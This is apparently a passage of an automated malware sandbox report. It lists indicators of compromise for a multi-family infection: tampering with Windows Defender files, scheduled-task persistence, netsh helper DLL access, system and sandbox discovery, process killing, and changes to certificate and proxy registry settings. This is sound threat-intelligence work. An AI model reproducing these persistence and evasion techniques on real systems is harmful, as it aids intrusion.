File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe

Drops file in Windows directory 31 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
File created	C:\Windows\Installer\e585668.msi	msiexec.exe
File opened for modification	C:\Windows\LogisticsNotre	7IIl2eE.exe
File opened for modification	C:\Windows\WallpapersHo	7IIl2eE.exe
File opened for modification	C:\Windows\PotteryUser	7IIl2eE.exe
File opened for modification	C:\Windows\Installer\e58566d.msi	msiexec.exe
File created	C:\Windows\Installer\e58566c.msi	msiexec.exe
File opened for modification	C:\Windows\JenniferSubdivision	7IIl2eE.exe
File created	C:\Windows\Tasks\httpTool_alpha.job	cmd.exe
File created	C:\Windows\Installer\SourceHash{2EF5B19F-6B07-454C-9A55-639BDA404CDF}	msiexec.exe
File opened for modification	C:\Windows\BrandonStat	7IIl2eE.exe
File opened for modification	C:\Windows\CorrectionsGeographic	7IIl2eE.exe
File created	C:\Windows\Installer\e585671.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\RowTopics	7IIl2eE.exe
File opened for modification	C:\Windows\GentleLogging	7IIl2eE.exe
File created	C:\Windows\Tasks\Algoworks.job	890172171_x64.exe
File created	C:\Windows\Tasks\controladvanced_MKO_test.job	cmd.exe
File opened for modification	C:\Windows\Installer\MSICAAF.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\e585668.msi	msiexec.exe
File opened for modification	C:\Windows\EnglandDeleted	7IIl2eE.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\ProvidingMilwaukee	7IIl2eE.exe
File opened for modification	C:\Windows\EstateLegislative	7IIl2eE.exe
File opened for modification	C:\Windows\DiscussedFacial	7IIl2eE.exe
File created	C:\Windows\Tasks\Protecttls.job	cmd.exe
File created	C:\Windows\Installer\SourceHash{37BD7FCD-CFF5-41A4-855A-AA18B2383F73}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI5781.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\SpecificsHeaven	7IIl2eE.exe
File created	C:\Windows\Installer\e58566d.msi	msiexec.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1592	sc.exe
2920	sc.exe
5368	sc.exe
4632	sc.exe
4500	sc.exe
6056	sc.exe
4552	sc.exe
5704	sc.exe
2032	sc.exe
5452	sc.exe
2288	sc.exe
3104	sc.exe
5128	sc.exe
5476	sc.exe
2096	sc.exe
3996	sc.exe
3280	sc.exe
3984	sc.exe
1392	sc.exe
2044	sc.exe
4508	sc.exe
1600	sc.exe
1144	sc.exe
5796	sc.exe
5744	sc.exe
4684	sc.exe
2976	sc.exe
4556	sc.exe
4544	sc.exe
2132	sc.exe
5844	sc.exe
2988	sc.exe
2116	sc.exe
3964	sc.exe
1500	sc.exe
1380	sc.exe
6108	sc.exe
2340	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 2 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	8c6895b6.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	8c6895b6.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
6404	5440	WerFault.exe	241
6468	6192	WerFault.exe	244
7520	7308	WerFault.exe	263

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CMD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	994f177e74.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3537b60da7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	97d82266f8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8c6895b6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2eff251326.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Passwords.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d9f1658.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CamMenuMaker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CamMenuMaker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dat483D.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-01_af6e3955b2d8c162d211d43ff6d72231_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PQPYAYJJ.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CamMenuMaker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dat2A7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fontdrvhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7IIl2eE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEYKSCXV.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KRWXARXD.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Abspawnhlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Rm3cVPI.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2468	PING.EXE
1076	PING.EXE
2596	PING.EXE
11464	PING.EXE
6496	PING.EXE
5784	PING.EXE
11400	PING.EXE
6184	PING.EXE
7004	PING.EXE
1092	PING.EXE
2404	PING.EXE
1684	PING.EXE
9472	PING.EXE
6768	PING.EXE
5400	PING.EXE
6912	PING.EXE
8164	PING.EXE
8744	PING.EXE
10668	PING.EXE
10924	PING.EXE
11384	PING.EXE
11836	PING.EXE
11444	PING.EXE
8860	PING.EXE
6460	PING.EXE
3540	PING.EXE
5968	PING.EXE
8248	PING.EXE
4276	PING.EXE
10432	PING.EXE
6212	PING.EXE
6732	PING.EXE
8576	PING.EXE
9548	PING.EXE
11708	PING.EXE
5524	PING.EXE
6544	PING.EXE
4704	PING.EXE
8460	PING.EXE
8544	PING.EXE
10024	PING.EXE
11596	PING.EXE
11524	PING.EXE
3432	PING.EXE
6384	PING.EXE
7048	PING.EXE
4300	PING.EXE
9760	PING.EXE
10196	PING.EXE
11644	PING.EXE
1792	PING.EXE
7744	PING.EXE
6528	PING.EXE
9692	PING.EXE
6068	PING.EXE
11244	PING.EXE
9348	PING.EXE
3312	PING.EXE
3160	PING.EXE
6280	PING.EXE
6328	PING.EXE
9832	PING.EXE
12048	PING.EXE
11904	PING.EXE

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	Updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Updater.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Updater.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	Updater.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	Updater.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
4472	timeout.exe

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
9632	taskkill.exe
9876	taskkill.exe
9928	taskkill.exe
10220	taskkill.exe
10292	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	Updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	dat2A7.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	Updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Abspawnhlp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	Updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Abspawnhlp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	dat2A7.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	Abspawnhlp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	Updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	dat483D.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	dat483D.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	dat483D.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	Updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	Updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	dat2A7.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Abspawnhlp.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000_Classes\Local Settings	Abspawnhlp.exe

Runs ping.exe 1 TTPs 64 IoCs

Remote System Discovery

T1018

pid	Process
2404	PING.EXE
8576	PING.EXE
8752	PING.EXE
3160	PING.EXE
7304	PING.EXE
8164	PING.EXE
8744	PING.EXE
2596	PING.EXE
6768	PING.EXE
11244	PING.EXE
12048	PING.EXE
8684	PING.EXE
6564	PING.EXE
6184	PING.EXE
6384	PING.EXE
6544	PING.EXE
4276	PING.EXE
6496	PING.EXE
10988	PING.EXE
6528	PING.EXE
9376	PING.EXE
11836	PING.EXE
11524	PING.EXE
8464	PING.EXE
3540	PING.EXE
11596	PING.EXE
11444	PING.EXE
11464	PING.EXE
9832	PING.EXE
10024	PING.EXE
9348	PING.EXE
6648	PING.EXE
4816	PING.EXE
7528	PING.EXE
7744	PING.EXE
10196	PING.EXE
10668	PING.EXE
11408	PING.EXE
2468	PING.EXE
1684	PING.EXE
5968	PING.EXE
9300	PING.EXE
7648	PING.EXE
5524	PING.EXE
1136	PING.EXE
6328	PING.EXE
9760	PING.EXE
11904	PING.EXE
8460	PING.EXE
9472	PING.EXE
5784	PING.EXE
11708	PING.EXE
8804	PING.EXE
3312	PING.EXE
3432	PING.EXE
6208	PING.EXE
1092	PING.EXE
4704	PING.EXE
10432	PING.EXE
6912	PING.EXE
10924	PING.EXE
11812	PING.EXE
8168	PING.EXE
4248	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5576	schtasks.exe
6056	schtasks.exe
2244	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
9724	CamMenuMaker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1448	powershell.exe
1448	powershell.exe
5032	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
5032	TempQXO5GGPXMOMIFNHLOX1OEN7KVVB1EZJH.EXE
4828	rapes.exe
4828	rapes.exe
3204	Abspawnhlp.exe
3692	Abspawnhlp.exe
3692	Abspawnhlp.exe
3692	Abspawnhlp.exe
3692	Abspawnhlp.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
5436	MSBuild.exe
3668	rapes.exe
3668	rapes.exe
2628	MSBuild.exe
2628	MSBuild.exe
2628	MSBuild.exe
2628	MSBuild.exe
